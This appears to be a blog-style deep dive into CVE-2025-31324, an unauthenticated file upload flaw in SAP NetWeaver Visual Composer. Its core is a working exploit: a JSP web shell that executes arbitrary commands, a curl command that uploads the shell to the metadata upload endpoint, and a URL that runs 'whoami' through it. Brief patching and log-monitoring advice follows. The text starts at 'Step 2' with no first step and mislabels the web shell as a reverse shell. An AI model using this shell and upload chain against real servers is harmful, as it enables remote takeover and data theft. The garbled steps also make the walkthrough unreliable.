CVE-2025-31324 - SAP NetWeaver Visual Composer Metadata Uploader Unauthenticated File Upload – Deep Dive and Exploit

Summary:
A new vulnerability, CVE-2025-31324, has been identified in SAP NetWeaver Visual Composer. This flaw allows anyone—without any login or authentication—to upload files, including potentially harmful binaries, directly to the server. This exposes businesses using SAP to serious risks: criminals could gain control, steal data, or bring the entire system down.

What is SAP NetWeaver Visual Composer?

SAP NetWeaver Visual Composer is a platform businesses use to visually design user interfaces (UIs) for SAP applications—without having to write a lot of code. It is widely used in enterprise environments where secure data sharing and application integration are crucial.

About the Vulnerability

In simple terms, the component called “Metadata Uploader” in SAP Visual Composer does not check who is uploading files. Anyone—good or bad—can upload anything, including malicious programs. This issue results from a lack of authorization controls on a key upload endpoint.

Usually, the URL will look like this

https://<SAP_SERVER>/VisualComposer/metadata/upload

Step 2: Craft a malicious file

For a real-world test, attackers could use a simple reverse shell. Here is a sample (in JSP for Java-based environments):

<% 
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p = Runtime.getRuntime().exec(cmd);
        java.io.InputStream in = p.getInputStream();
        int a = -1;
        while((a=in.read())!=-1){
            out.print((char)a);
        }
    }
%>

With no login required, an attacker can use a simple curl command

curl -X POST -F "file=@shell.jsp" https://<SAP_SERVER>/VisualComposer/metadata/upload

If successful, the file will be stored on the server—where the attacker can call it later to execute commands remotely.

After uploading their file, the attacker can visit

https://<SAP_SERVER>/VisualComposer/metadata/uploads/shell.jsp?cmd=whoami

This could return the user the server is running under, confirming full code execution.

References and Additional Reading

- SAP Security Patch Day – March 2025
- CVE-2025-31324 at NVD
- Vendor Mitigation Guide (SAP Notes)
- OWASP Unrestricted File Upload

Patch Immediately:

SAP has released a security update. Apply it as soon as possible from the SAP Security Patch Day portal.

Monitor logs:

Look for suspicious uploads or requests to /VisualComposer/metadata/upload and /uploads/.

Conclusion

CVE-2025-31324 in SAP NetWeaver Visual Composer is an example of how missing simple security checks can lead to devastating attacks. Enterprises should address this immediately, keep their systems up to date, and always restrict file upload capabilities.

Timeline

Published on: 04/24/2025 17:15:35 UTC